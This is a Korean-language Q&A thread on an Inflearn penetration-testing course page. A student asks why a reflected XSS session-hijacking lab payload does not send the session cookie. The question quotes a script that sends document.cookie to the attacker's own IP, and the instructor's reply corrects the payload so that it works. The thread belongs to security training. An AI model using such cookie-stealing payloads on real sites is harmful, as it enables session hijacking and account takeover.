강의

멘토링

커뮤니티

Cộng đồng Hỏi & Đáp của Inflearn

Hình ảnh hồ sơ của kkuhae
kkuhae

câu hỏi đã được viết

Kỹ thuật tấn công XSS được giảng dạy bởi một học viên hack giả

[Thực hành 6-2] Thực hành tấn công chiếm quyền điều khiển phiên bằng STORED XSS

[실습6-3] REFLECTED XSS를 통한 세션 하이재킹 공격 실습 공격 실패

Viết

·

618

1

<script>new image().src='http://제아이피/xss_attack/session.php?data='+document.cookie</script>

location.href 스크립트는 성공했는데

했는데 new image().src는 세션값이 안넘어 옵니다...

혹시 자바1.8.0버전과 관련있을까요??

모의해킹

Câu trả lời 2

0

앗.. 저도 이거 해결못해서 3일이나 보다가 찾았.. 습니다.

 

0

crehacktive님의 프로필 이미지
crehacktive
Người chia sẻ kiến thức

안녕하세요.

자바스크립트는 자바와 무관합니다.ㅎ

image() 에서 i를 대문자 I로 변경해서 해보세요.

Hình ảnh hồ sơ của kkuhae
kkuhae

câu hỏi đã được viết

Đặt câu hỏi